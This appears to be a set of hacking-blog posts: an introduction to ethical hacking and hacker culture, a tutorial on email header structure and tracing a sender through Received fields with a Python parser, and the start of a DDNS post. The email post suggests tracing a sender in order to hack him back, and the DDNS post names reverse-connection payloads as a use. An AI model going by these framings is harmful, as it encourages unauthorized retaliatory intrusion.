Ethical Hacking and The Hacker Culture

Nowadays most of us have heard the term Ethical Hacker, due to ‘hacktivist’ groups like Anonymous gaining popularity in the media. But what exactly is Ethical Hacking? We have a general idea that it means hacking without any malicious intent, or more simply the kind of hacking the ‘good guys’ do. But if we delve deeper, it means more than that: it represents a philosophy and morality popular among the hacker and hacktivist communities.

Definition

Formally, Ethical Hacking may be defined as the practice of systematically attempting to break into or penetrate a computer system, for the purpose of locating its weaknesses and vulnerabilities, by duplicating the actions of malicious black-hat hackers. Actually, what I just said defines Penetration Testing; to be precise, ‘Ethical Hacking’ is a term coined by IBM meant to imply a broader category than just penetration testing. Ethical hackers do this ‘penetration testing’ at the request of, or by being employed by, the owner of the computer system, so that the owner can fix these weaknesses and make the system more secure.

Philosophy

Ethical hackers generally follow a set of moral values and a philosophy. They promote the sharing of knowledge and believe that all information should be free. They also believe that bureaucracies such as corporations are flawed systems, and they promote decentralization because it may lead to the free exchange of information. They say that hackers shouldn’t be judged by their age, race, or qualifications, but only by their hacking skill. A common value of community and collaboration is also present among hackers.

I should emphasize that being an ethical hacker doesn’t necessarily mean having these qualities and following these moral values and philosophies. Hacker ethics are separate from just being a hacker. But these ethics are very popular among the general hacking community, and so they may be considered a trait of the community, if not of an individual hacker.

Before concluding I would like to share a small essay written by a hacker by the name (rather, pseudonym) of ‘The Mentor’ shortly after being arrested. It’s called ‘The Hacker Manifesto’, and is considered one of the cornerstones of hacker culture. You can find it here – http://www.phrack.org/issues/7/3.html

Email | Structure and How to Trace it

We have all, at some point in our lives, received fake spam mail telling us that we’ve won a million dollars. Maybe one day you receive a threatening email or a simple phishing mail, and you want to find out who sent it so that you can hack him in return. To do that you need to know the IP address of the mail server that sent the email. In this article I’m going to show you how to do that, after introducing you to the basics of the structure of an Internet Message or, simply, Email.

Email is one of the oldest modes of communication over a computer network (usually the Internet) and is still popular today. The Email we are familiar with was standardized and came into popular usage in the early 1970s, and it has been a core foundation of the Internet since then. Nowadays we all use a fancy web interface or mobile app to send and view emails, so we don’t have to worry about how it works. But that isn’t enough for a hacker, is it? If we don’t know the detailed intricacies of its mechanism, how can we exploit it or do something advanced with it? So, keep reading!

The Internet Message Format

The current Email format is defined in RFC 5322. The format of multimedia Email attachments is defined in RFC 2045 through RFC 2049, and this format is called Multimedia Internet Mail Extensions, or simply MIME. You can read those RFCs to get fully detailed, formal documentation of the structure and format of email, but it’s not necessary, as I will discuss it briefly here. Nevertheless, if you are interested in learning more, you can check them out after reading this post.

At the most basic level, an email is a series of ASCII characters. It consists of lines of characters, each line ending with ASCII ‘CRLF’ (carriage return and line feed). The entire email can be divided into two parts: the header section and the body. Let’s look at an example email to get an idea of what we are talking about.

Delivered-To: john.doe@gmail.com
Received: by 10.200.55.226 with SMTP id e31csp1128773qtc;
        Tue, 18 Oct 2016 09:50:19 -0700 (PDT)
X-Received: by 10.107.131.213 with SMTP id n82mr2118112ioi.125.1476809419401;
        Tue, 18 Oct 2016 09:50:19 -0700 (PDT)
Return-Path: 
Received: from o6.em.email.accounts.autodesk.com (o6.em.email.accounts.autodesk.com. [167.89.4.107])
        by mx.google.com with ESMTPS id g126si21395826ioa.252.2016.10.18.09.50.19
        for 
        (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128);
        Tue, 18 Oct 2016 09:50:19 -0700 (PDT)
Received-SPF: pass (google.com: domain of bounces+1621835-f4d2-john.doe=gmail.com@em.email.accounts.autodesk.com designates 167.89.4.107 as permitted sender) client-ip=167.89.4.107;
Authentication-Results: mx.google.com;
        dkim=pass header.i=@email.accounts.autodesk.com;
        dkim=pass header.i=@sendgrid.info;
        spf=pass (google.com: domain of bounces+1621835-f4d2-john.doe=gmail.com@em.email.accounts.autodesk.com designates 167.89.4.107 as permitted sender) smtp.mailfrom=bounces+1621835-f4d2-john.doe=gmail.com@em.email.accounts.autodesk.com
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed; d=email.accounts.autodesk.com; h=mime-version:from:to:reply-to:subject:content-type:content-transfer-encoding; s=smtpapi; bh=yheKlMFCWTtON78IXgxVWyAUb78=; b=I8q38u7TFdqinW6Y02 AM+ifHWAvTihYfBs5GSZl8JDnuc1BlMffeS8KUkWyRJjLY+B0ch4uPXBvCHdCZ75 VGkMp0jmmQRyVzQ4hfvAeTYVJ0fDzB89cHKyTzLTpd/ak9D0OAcc+6TJFqCgURMH CSrAzDL/ejxBTOEgepL8Y3Feg=
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed; d=sendgrid.info; h=mime-version:from:to:reply-to:subject:content-type:content-transfer-encoding:x-feedback-id; s=smtpapi; bh=yheKlMFCWTtON78IXgxVWyAUb78=; b=YK6zoBmBYxE2GRUFIh Qze6EJGuxLw1UtO+NGfdmUgSmtNVLUt8p/N+CS9nPNONFESaVo2Ebk0iV8OBXqs0 EhPaOVOIiAcnSI/fwzd8A/dN+y3gqNquU3ysc9Gyk3kDcFSI8nj9yC4uhAs4fpMv AC/2kWdHjFjHBiTRYcL07C46M=
Received: by filter0958p1mdw1.sendgrid.net with SMTP id filter0958p1mdw1.2775.580652C7AF
        2016-10-18 16:50:15.915852162 +0000 UTC
Received: from ECPRID2AWEB004 (ec2-52-4-196-162.compute-1.amazonaws.com [52.4.196.162]) by ismtpd0006p1iad1.sendgrid.net (SG) with ESMTP id aIawJW2DTFi0CgbichcKJg for ; Tue, 18 Oct 2016 16:50:15.917 +0000 (UTC)
MIME-Version: 1.0
From: Autodesk 
To: john.doe@gmail.com
Reply-To: noreply@mail.accounts.autodesk.com
Date: 18 Oct 2016 16:50:15 +0000
Subject: Verify your Autodesk account
Content-Type: text/html; charset=utf-8
Content-Transfer-Encoding: base64
Message-ID: 
X-SG-EID: iimKsBOu00eJI3OJPONMulw6aZ/yjiemm1SqdEDLcTZBP1eHyN3Qr32i1Vdhd5J7BwflVrWhRCLr0j woo/OKUHaIA1bGmnv8Qd2DfN0OSocqGDQ8DK7afms0hcjbrNUG/S3Bsv7fJWCR15UEaoJ/qfJtpdgG gZSAdl3d07GxUEWB0KHMNBmsfHLUEhfyzWPfn5IBYcQ334wRxcWBQ/eu31XQd8fIXETIiBgrd19ic6 SiLuZKRyxs7mVzCv46+9G/
X-Feedback-ID: 1621835:SZNY+iwS6efjfOV9JjNuzvzTddPNBc3FolKu4zujGFA=:SZNY+iwS6efjfOV9JjNuzvzTddPNBc3FolKu4zujGFA=:SG

PGh0bWw+DQo8aGVhZD4NCjxsaW5rIGhyZWY9Imh0dHA6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9j
c3M/ZmFtaWx5PU9wZW4rU2Fuczo0MDAsMzAwLDcwMCIgcmVsPSJzdHlsZXNoZWV0IiB0eXBlPSJ0
ZXh0L2NzcyIgLz4NCjxzdHlsZT4NCiAgICAgICBAaW1wb3J0IHVybChodHRwOi8vZm9udHMuZ29v
Z2xlYXBpcy5jb20vY3NzP2ZhbWlseT1PcGVuK1NhbnM6NDAwLDMwMCw3MDApOw0KCSAgIFtzdHls
ZSo9Ik9wZW4gU2FucyJdIHsNCiAgICBmb250LWZhbWlseTogJ09wZW4gU2FucycsIEFyaWFsLCBz
YW5zLXNlcmlmICFpbXBvcnRhbnQNCn0NCg0KYXsNCnRleHQtZGVjb3JhdGlvbjpub25lICFpbXBv
cnRhbnQ7DQpjb2xvcjojMDY5NkQ3ICFpbXBvcnRhbnQ7DQp9DQphOmhvdmVyew0KdGV4dC1kZWNv
cmF0aW9uOnVuZGVybGluZSAhaW1wb3J0YW50Ow0KDQp9DQo8L3N0eWxlPg0KPC9oZWFkPg0KICA8
Ym9keSBzdHlsZT0icGFkZGluZzozMnB4IDEwJTsgbWFyZ2luOjBweDsgZm9udC1mYW1pbHk6J09w
ZW4gU2FucycsICdIZWx2ZXRpY2EgTmV1ZScsIEhlbHZldGljYSxBcmlhbCwgU2Fucy1TZXJpZjtj
b2xvcjogIzMzMzsgYmFja2dyb3VuZC1jb2xvcjogI0ZGRkZGRjsiPg0KICAgIDx0YWJsZSAgc3R5
bGU9ImJvcmRlcjoxcHggc29saWQgI2NjYzsiICA+DQogICAgICAgPHRyICA+DQogICAgICAgICA8
dGQgc3R5bGU9InBhZGRpbmc6MHB4O21hcmdpbjozMnB4O21hcmdpbi1ib3R0b206MHB4OyIgYWxp
Z249ImxlZnQiPg0KICAgICAgICAgICAgPGltZyBzdHlsZT0ibWFyZ2luOjMycHg7bWFyZ2luLWJv
dHRvbTowcHgiIHNyYz0iaHR0cHM6Ly9hcGkuYXV0b2Rlc2suY29tL2NvbnRlbnQvaWRlbnRpdHkv
MS4wLjIxMTguMzg4MTU5LjEwMjMvei9Db250ZW50L2ltYWdlcy9sYXlvdXQvYXV0b2Rlc2stZW1h
aWwtbG9nby5wbmciIGFsdD0iQXV0b2Rlc2siLz4NCiAgICAgICAgIDwvdGQ+DQogICAgICA8L3Ry
Pg0KICAgICAgPHRyID4NCiAgICAgICAgPHRkIHN0eWxlPSJwYWRkaW5nOjMycHg7Ij4NCiAgICAg
ICAgICA8dGFibGUgYm9yZGVyPSIwIiBjZWxsc3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9IjAiIHdp
ZHRoPSIxMDAlIiBzdHlsZT0id2lkdGg6IDEwMCU7Ij4NCiAgICAgICAgICAgIDx0ciBzdHlsZT0i
bWFyZ2luOjMycHg7bWFyZ2luLWxlZnQ6MHB4Ij4NCiAgICAgICAgICAgICAgPHRkPg0KCQkJICAg
IDx0YWJsZSBib3JkZXI9IjAiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMCIgc3R5bGU9
ImZvbnQtZmFtaWx5OiAnT3BlbiBTYW5zJywnSGVsdmV0aWNhIE5ldWUnLCBIZWx2ZXRpY2EsQXJp
YWwsIFNhbnMtU2VyaWYiPg0KCQkJCSAgICA8dHI+DQoJCQkJCSAgICA8dGQgIHN0eWxlPSJmb250
LWZhbWlseTogJ09wZW4gU2FucycsJ0hlbHZldGljYSBOZXVlJywgSGVsdmV0aWNhLEFyaWFsLCBT
YW5zLVNlcmlmIj4NCgkJCQkgICAgICAgICAgICA8cCBzdHlsZT0iZm9udC1zaXplOiAyMnB4O21h
cmdpbjowcHg7cGFkZGluZzowcHg7Zm9udC13ZWlnaHQ6NDAwIj4NCgkJCQkgICAgICAgICAgICAg
SGkgU3VtaXQgR2hvc2gsDQoJCQkJICAgICAgICAgICAgPC9wPg0KCQkJCSAgICAgICAgICAgIDxw
IHN0eWxlPSJmb250LXNpemU6IDE0cHg7bWFyZ2luOjBweDtwYWRkaW5nOjBweDttYXJnaW4tdG9w
OjE2cHg7Zm9udC1mYW1pbHk6J09wZW4gU2FucycsJ0hlbHZldGljYSBOZXVlJywgSGVsdmV0aWNh
LGFyaWFsO2ZvbnQtd2VpZ2h0OjQwMDtsaW5lLWhlaWdodDoxLjYiPg0KCQkJCQkgICAgICAgICAg
IFdlbGNvbWUgdG8gQXV0b2Rlc2shDQoJCQkJICAgICAgICAgICAgPC9wPg0KCQkJCQkJCSA8cCBz
dHlsZT0iZm9udC1zaXplOiAxNHB4O2NvbG9yOiMzMzM7dGV4dC1kZWNvcmF0aW9uOm5vbmU7cGFk
ZGluZzowcHg7bWFyZ2luOjBweDtmb250LWZhbWlseTonT3BlbiBTYW5zJywnSGVsdmV0aWNhIE5l
dWUnLCBIZWx2ZXRpY2EsYXJpYWw7Zm9udC13ZWlnaHQ6NDAwO2xpbmUtaGVpZ2h0OjEuNiI+DQoJ
CQkJCSAgICAgICAgICAgUGxlYXNlIGNvbXBsZXRlIHlvdXIgYWNjb3VudCBieSB2ZXJpZnlpbmcg
eW91ciBlbWFpbCBhZGRyZXNzLg0KCQkJCSAgICAgICAgICAgIDwvcD4NCgkJCQkgICAgICAgICAg
ICA8cCA+DQoJCQkJCQkJICA8IS0tW2lmIG1zb10+DQoJCQkJCQkJICAgIDxwIHN0eWxlPSJtYXJn
aW4tdG9wOjE2cHg7bWFyZ2luLWJvdHRvbTozMnB4OyI+DQogICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgIDx2OnJvdW5kcmVjdCB4bWxuczp2PSJ1cm46c2NoZW1hcy1taWNyb3NvZnQt
Y29tOnZtbCIgeG1sbnM6dz0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTpvZmZpY2U6d29yZCIg
aHJlZj0iaHR0cHM6Ly9hY2NvdW50cy5hdXRvZGVzay5jb206NDQzL3VzZXIvdmVyaWZ5ZW1haWwv
MzlkYzYwNjhiYTgwMzc2ZTVhY2ZhN2NiOWE3ZDUwZDM3MTM3NGMyMz9yZWZlcnJlcj1odHRwJTNB
JTJGJTJGd3d3LmF1dG9kZXNrLmNvbSUyRmVkdWNhdGlvbiUyRmZyZWUtc29mdHdhcmUlMkZpbnZl
bnRvci1wcm9mZXNzaW9uYWwmcHJvZHVjdG5hbWU9ZG90Y29tJnVpdHlwZT1lZHVjYXRpb24iIHN0
eWxlPSJoZWlnaHQ6NTBweDt3aWR0aDogMjAwcHg7di10ZXh0LWFuY2hvcjptaWRkbGU7d2lkdGg6
YXV0bzt0ZXh0LXRyYW5zZm9ybTogdXBwZXJjYXNlOyIgYXJjc2l6ZT0iMCUiICBzdHJva2U9ImYi
IGZpbGxjb2xvcj0iIzA2OTZENyI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICA8dzphbmNob3Jsb2NrLz4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8
Y2VudGVyIHN0eWxlPSJjb2xvcjojZmZmZmZmO2ZvbnQtZmFtaWx5OidPcGVuIFNhbnMnLCdIZWx2
ZXRpY2EgTmV1ZScsIEhlbHZldGljYSxhcmlhbDtmb250LXNpemU6MTlweCI+DQogICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWRVJJRlkgRU1BSUwNCiAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgPC9jZW50ZXI+DQogICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgIDwvdjpyb3VuZHJlY3Q+DQoJCQkJCQkJCSAgIDwvcD4NCiAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgPCFbZW5kaWZdLS0+DQogICAgICAgICAgICAgICAgICAgICAgICAg
ICAgIDwhW2lmICFtc29dPg0KCQkJCQkJCSAgICAgPHRhYmxlIGJvcmRlcj0iMCIgc3R5bGU9Im1h
cmdpbi10b3A6MzJweDttYXJnaW4tYm90dG9tOjQ4cHg7d2lkdGg6IDEwMCU7IiBjZWxsc3BhY2lu
Zz0iMCIgY2VsbHBhZGRpbmc9IjAiIHdpZHRoPSIxMDAlIiA+DQogICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICA8dHIgPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgPHRkID4NCgkJCQkJCQkgICAgICAgICAgPHRhYmxlIGFsaWduPSJsZWZ0IiBzdHlsZT0idGV4
dC1hbGlnbjogY2VudGVyO3ZlcnRpY2FsLWFsaWduOmNlbnRlcjsgY29sb3I6ICNmZmY7IGRpc3Bs
YXk6IGJsb2NrOyI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dHI+DQog
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dGQ+DQogICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgPGEgc3R5bGU9ImNvbG9yOiNmZmYgIWltcG9ydGFudDtwYWRkaW5n
OiAxNnB4O2hlaWdodDo1MHB4OyBiYWNrZ3JvdW5kLWNvbG9yOiMwNjk2RDc7Zm9udC1zaXplOjE5
cHg7dGV4dC1kZWNvcmF0aW9uOm5vbmU7dGV4dC10cmFuc2Zvcm06IHVwcGVyY2FzZTtmb250LWZh
bWlseTogJ09wZW4gU2FucycsJ0hlbHZldGljYSBOZXVlJywgSGVsdmV0aWNhLEFyaWFsLCBTYW5z
LVNlcmlmIiBocmVmPSJodHRwczovL2FjY291bnRzLmF1dG9kZXNrLmNvbTo0NDMvdXNlci92ZXJp
ZnllbWFpbC8zOWRjNjA2OGJhODAzNzZlNWFjZmE3Y2I5YTdkNTBkMzcxMzc0YzIzP3JlZmVycmVy
PWh0dHAlM0ElMkYlMkZ3d3cuYXV0b2Rlc2suY29tJTJGZWR1Y2F0aW9uJTJGZnJlZS1zb2Z0d2Fy
ZSUyRmludmVudG9yLXByb2Zlc3Npb25hbCZwcm9kdWN0bmFtZT1kb3Rjb20mdWl0eXBlPWVkdWNh
dGlvbiI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWRVJJRlkgRU1B
SUwNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvYT4NCiAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
IDwvdHI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L3RhYmxlPg0KCQkJCQkJCSAg
ICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC90cj4NCiAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgIDwvdGFibGU+DQogICAgICAgICAgICAgICAgICAgICAgICAg
ICA8IVtlbmRpZl0+DQoJCQkJCQkgICA8L3A+DQoJCQkJICAgICAgICAgICANCgkJCQkgICAgICAg
ICAgICA8cCBzdHlsZT0id29yZC13cmFwOmJyZWFrLXdvcmQ7IGRpc3BsYXk6IGJsb2NrO2ZvbnQt
c2l6ZTogMTJweDtmb250LWZhbWlseTogJ09wZW4gU2FucycsJ0hlbHZldGljYSBOZXVlJywgSGVs
dmV0aWNhLEFyaWFsLCBTYW5zLVNlcmlmO2ZvbnQtd2VpZ2h0OjQwMDtsaW5lLWhlaWdodDoxLjYi
Pg0KCQkJCQkgICAgICAgICAgICBJZiB0aGUgbGluayBhYm92ZSBkb2Vzbid0IHdvcmssIHlvdSBj
YW4gY29weSBhbmQgcGFzdGUgdGhlIGZvbGxvd2luZyBpbnRvIHlvdXIgYnJvd3Nlcjo8YnIvPg0K
CQkJCQkgICAgICAgICAgICBodHRwczovL2FjY291bnRzLmF1dG9kZXNrLmNvbTo0NDMvdXNlci92
ZXJpZnllbWFpbC8zOWRjNjA2OGJhODAzNzZlNWFjZmE3Y2I5YTdkNTBkMzcxMzc0YzIzP3JlZmVy
cmVyPWh0dHAlM0ElMkYlMkZ3d3cuYXV0b2Rlc2suY29tJTJGZWR1Y2F0aW9uJTJGZnJlZS1zb2Z0
d2FyZSUyRmludmVudG9yLXByb2Zlc3Npb25hbCZwcm9kdWN0bmFtZT1kb3Rjb20mdWl0eXBlPWVk
dWNhdGlvbg0KCQkJCSAgICAgICAgICAgIDwvcD4NCiAgICAJCQkgICAgICAgIDwvdGQ+DQogICAg
ICAgICAgICAgICAgICAgICAgPC90cj4NCiAgICAgICAgICAgICAgICAgIDwvdGFibGU+DQogICAg
ICAgICAgICAgIDwvdGQ+DQogICAgICAgICAgICA8L3RyPg0KICAgICAgICAgIDwvdGFibGU+DQog
ICAgICAgIDwvdGQ+DQoJPC90cj4NCiAgICA8L3RhYmxlPg0KCTx0YWJsZT4NCgk8dHI+DQogICAg
ICAgIDx0ZCBzdHlsZT0iY29sb3I6ICM5OTk7IGZvbnQtc2l6ZTogMTJweDsgZm9udC1mYW1pbHk6
J09wZW4gU2FucycsICdIZWx2ZXRpY2EgTmV1ZScsIEhlbHZldGljYSxBcmlhbCwgU2Fucy1TZXJp
Zjtmb250LXdlaWdodDo0MDA7bGluZS1oZWlnaHQ6MS42Ij4NCiAgICAgICAgPHAgc3R5bGU9Im1h
cmdpbi10b3A6IDE2cHg7IHBhZGRpbmctdG9wOiAwO21hcmdpbi1ib3R0b206MHB4Ij4NCiAgICAg
ICAgICAgICAgQXV0b2Rlc2sgcmVzcGVjdHMgeW91ciBwcml2YWN5LiAgRm9yIG1vcmUgaW5mb3Jt
YXRpb24sIHBsZWFzZSByZXZpZXcgb3VyIDxhIGhyZWY9Imh0dHA6Ly91c2EuYXV0b2Rlc2suY29t
L3ByaXZhY3kvIj5Qcml2YWN5IFBvbGljeTwvYT4uDQogICAgICAgPC9wPg0KCSAgIDxwICBzdHls
ZT0ibWFyZ2luLXRvcDogMDttYXJnaW4tYm90dG9tOiAwOyBwYWRkaW5nLXRvcDogMDtjb2xvcjog
Izk5OTsgZm9udC1zaXplOiAxMnB4OyBmb250LWZhbWlseTonT3BlbiBTYW5zJywgJ0hlbHZldGlj
YSBOZXVlJywgSGVsdmV0aWNhLEFyaWFsLCBTYW5zLVNlcmlmO2ZvbnQtd2VpZ2h0OjQwMDtsaW5l
LWhlaWdodDoxLjYiPg0KCSAgICA8cCBzdHlsZT0icGFkZGluZzogMDsgbWFyZ2luOiAwOyI+DQog
ICZjb3B5OyBDb3B5cmlnaHQgMjAxNiBBdXRvZGVzaywgSW5jLiBBbGwgcmlnaHRzIHJlc2VydmVk
Lg0KPC9wPgkgICA8L3A+DQogICAgICAgIDwvdGQ+DQogICAgICA8L3RyPg0KCTwvdGFibGU+DQog
IDwvYm9keT4NCjwvaHRtbD4=

The part before the first empty line is the header of this email, and the rest after that is the body. Here you can see that the body part looks like incomprehensible garbage; that’s because it is a MIME message, and the garbage is actually HTML data encoded with Base64. You can decode it using any Base64 decoder found online and get the HTML data. Anyway, we are going to focus on the header part, because all the other critical information resides there; the body contains just the message.

We can see that the header section consists of header fields, each header field consisting of a field name and a field value separated by a colon ‘:’. For example, a header field of this email is

Delivered-To: john.doe@gmail.com

where ‘Delivered-To’ is the field name and ‘john.doe@gmail.com’ is the field value. Just to be clear, I replaced my original email address with ‘john.doe@gmail.com’ here.

The header section can contain any number of fields in this format; there is no restriction. So different emails can carry different header fields. But there are certain fields that are mandatory, and those contain the information we need to trace the mail. You can read about the various email header fields here on Wikipedia.

Tracing an Email

Now that we know the basics of the Internet Message Format, it’s time to dive into the fun stuff: tracing the email. For that, we need to concentrate on the trace fields, so to speak. They contain the information needed to trace it, obviously. The trace fields are:

  • Received
  • Return-Path
  • Authentication-Results
  • Received-SPF
  • Auto-Submitted
  • VBR-Info

Among these, the Received field is the most important and most reliable. When an SMTP server receives a message it inserts this header at the top of the message. And as most emails go through several SMTP servers on the journey from sender to receiver, a message contains several Received fields, each one inserted by a different SMTP server. In the example email the Received fields are:

Received: by 10.200.55.226 with SMTP id e31csp1128773qtc;
        Tue, 18 Oct 2016 09:50:19 -0700 (PDT)
X-Received: by 10.107.131.213 with SMTP id n82mr2118112ioi.125.1476809419401;
        Tue, 18 Oct 2016 09:50:19 -0700 (PDT)
Received: from o6.em.email.accounts.autodesk.com (o6.em.email.accounts.autodesk.com. [167.89.4.107])
        by mx.google.com with ESMTPS id g126si21395826ioa.252.2016.10.18.09.50.19
        for 
        (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128);
        Tue, 18 Oct 2016 09:50:19 -0700 (PDT)
Received: by filter0958p1mdw1.sendgrid.net with SMTP id filter0958p1mdw1.2775.580652C7AF
        2016-10-18 16:50:15.915852162 +0000 UTC
Received: from ECPRID2AWEB004 (ec2-52-4-196-162.compute-1.amazonaws.com [52.4.196.162]) by ismtpd0006p1iad1.sendgrid.net (SG) with ESMTP id aIawJW2DTFi0CgbichcKJg for ; Tue, 18 Oct 2016 16:50:15.917 +0000 (UTC)

As SMTP servers insert the Received field at the top of the email when they receive it, if we read the fields from top to bottom we can trace the path through which the email has travelled. The field value of a Received header generally contains the host name or IP address of the server itself and the host name or IP of the server from which it received the mail.

Another thing to note: I’ve also listed the X-Received header field. Any field whose name starts with X is a non-standard header and cannot be trusted. Such fields are used by mail servers for their own purposes; generally a server won’t trust X headers inserted by any other server. Anyway, I’ve still included it because it may give us some additional information, keeping in mind that it is not very reliable. So from the Received (and X-Received) fields of the example mail, we can trace the route of the mail, and it looks like this:

  • ec2-52-4-196-162.compute-1.amazonaws.com [52.4.196.162]
  • ismtpd0006p1iad1.sendgrid.net
  • filter0958p1mdw1.sendgrid.net
  • o6.em.email.accounts.autodesk.com
  • mx.google.com
  • 10.107.131.213
  • 10.200.55.226

The email went through these servers in this order. So the mail server that actually sent the email is the first one, and if you were after that one for whatever reason, you can focus on it.
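The header-field parsing and the Received-chain walk described above can be done in a few lines with Python’s standard library. The block below is an added example (not part of the original post): it parses a constructed sample message (documentation hostnames, RFC 5737 addresses), splits each Received field into the host that handed the mail over, the IP the receiving server observed for it, the receiving server, and the timestamp, then lists the hops origin-first just like the route above, and also pulls the spf/dkim verdicts out of Authentication-Results. One caveat worth seeing in code: the name after `from` is whatever the sending host announced, while the bracketed address is what the receiving server itself recorded, so only the latter is trustworthy for a hop, and any Received line below the first one added by a server you trust could have been written by the sender.

```python
import email
import re
from email.utils import parsedate_to_datetime

# Constructed sample (header section plus a stub body), not a real message.
# Hostnames use documentation domains and the IPs come from RFC 5737 ranges.
SAMPLE_MESSAGE = """\
Delivered-To: recipient@example.com
Received: from outbound.sender.example.org (outbound.sender.example.org. [198.51.100.7])
        by mx.example.com with ESMTPS id abc123
        for <recipient@example.com>
        (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128);
        Tue, 18 Oct 2016 09:50:19 -0700 (PDT)
Received-SPF: pass (example.com: domain of bounce@sender.example.org designates 198.51.100.7 as permitted sender) client-ip=198.51.100.7;
Authentication-Results: mx.example.com;
        dkim=pass header.i=@sender.example.org;
        spf=pass smtp.mailfrom=bounce@sender.example.org
Received: by filter1.relay.example.net with SMTP id def456;
        Tue, 18 Oct 2016 16:50:16 +0000 (UTC)
Received: from WEBHOST01 (host25.customer.example.net [203.0.113.25])
        by ismtp1.relay.example.net with ESMTP id ghi789;
        Tue, 18 Oct 2016 16:50:15 +0000 (UTC)
From: Example Sender <noreply@sender.example.org>
To: recipient@example.com
Subject: Verify your account

(body omitted)
"""

# "from <announced-name> (<observed-name> [<ip>]) by <receiver> ..."; the from clause
# is optional because an MTA's internal handoffs often carry only a "by" clause.
RECEIVED_RE = re.compile(
    r"^(?:from\s+(?P<from_host>\S+)\s*(?:\((?P<from_info>[^)]*)\))?\s+)?"
    r"by\s+(?P<by_host>[^\s;]+)",
    re.IGNORECASE,
)
IPV4_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def parse_received(value):
    """Parse one Received field value (folded or not) into a hop dict, or None."""
    flat = re.sub(r"\s+", " ", value).strip()      # unfold continuation lines
    m = RECEIVED_RE.match(flat)
    if not m:
        return None
    ip = IPV4_RE.search(m.group("from_info") or "")
    timestamp = None
    if ";" in flat:                                  # the date follows the last ';'
        try:
            timestamp = parsedate_to_datetime(flat.rsplit(";", 1)[1].strip())
        except (TypeError, ValueError):
            timestamp = None                         # non-RFC date formats are tolerated
    return {
        "from_host": m.group("from_host"),           # announced by the sender: unverified
        "from_ip": ip.group(1) if ip else None,      # recorded by the receiver: reliable
        "by_host": m.group("by_host"),
        "timestamp": timestamp,
    }


def trace_route(raw_message):
    """Return the hops in transit order (origin first); the lowest Received is the earliest."""
    msg = email.message_from_string(raw_message)
    hops = [h for h in map(parse_received, msg.get_all("Received", [])) if h]
    hops.reverse()
    return hops


def route_labels(hops):
    """Flatten hops into the server list in the order the mail travelled."""
    labels = []
    for hop in hops:
        if hop["from_host"] and (not labels or labels[-1].split(" ")[0] != hop["from_host"]):
            labels.append(hop["from_host"] + (f" [{hop['from_ip']}]" if hop["from_ip"] else ""))
        labels.append(hop["by_host"])
    return labels


def uncorroborated_hops(hops):
    """Indices of hops whose claimed 'from' host is not the previous hop's receiver."""
    return [i for i in range(1, len(hops))
            if hops[i]["from_host"] and hops[i]["from_host"] != hops[i - 1]["by_host"]]


def transit_seconds(hops):
    """Seconds between the earliest and latest hop timestamps (None if fewer than two)."""
    stamps = [h["timestamp"] for h in hops if h["timestamp"] is not None]
    return int((stamps[-1] - stamps[0]).total_seconds()) if len(stamps) >= 2 else None


def authentication_results(raw_message):
    """Collect the spf/dkim/dmarc verdicts the receiving server recorded."""
    msg = email.message_from_string(raw_message)
    verdicts = {}
    for value in msg.get_all("Authentication-Results", []):
        for method, result in re.findall(r"\b(spf|dkim|dmarc)=(\w+)", value, re.IGNORECASE):
            verdicts.setdefault(method.lower(), []).append(result.lower())
    return verdicts


if __name__ == "__main__":
    hops = trace_route(SAMPLE_MESSAGE)
    for label in route_labels(hops):
        print(label)
    print("uncorroborated hops:", uncorroborated_hops(hops))
    print("transit seconds:", transit_seconds(hops))
    print("authentication:", authentication_results(SAMPLE_MESSAGE))
```

Paste a real header block into `SAMPLE_MESSAGE` (or read it from a file) and the same functions apply; the `uncorroborated_hops` result is a prompt to look closer, not proof of forgery, since legitimate providers commonly hand mail between internal hosts that never appear as the next hop’s `by`.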

Automating the Tracing of an Email

Although it’s good, or maybe essential, for a hacker to know how to trace an email manually, you don’t have to do it by hand every time. There are many tools on the Internet that automate this process. You just have to paste the email header into one of those tools and it will trace the route for you. Just search for ‘email header analyser’ in Google and you’ll get a lot of tools like this. There’s one made by Google itself; you can get it here. Happy hacking!


Use DDNS to Deal with Your Dynamic Public IP

Many of us have an internet connection with a dynamic public IP. That poses some problems if you want to use that connection to host a website or, for hackers like us, to hack using reverse connection payloads. In this post I’m going to discuss how you can overcome that using Dynamic DNS, or DDNS. But I’m getting ahead of myself, so let me start by explaining what a public IP is and what problems you can encounter if you have a dynamic one.

Understanding Dynamic Public IP Address

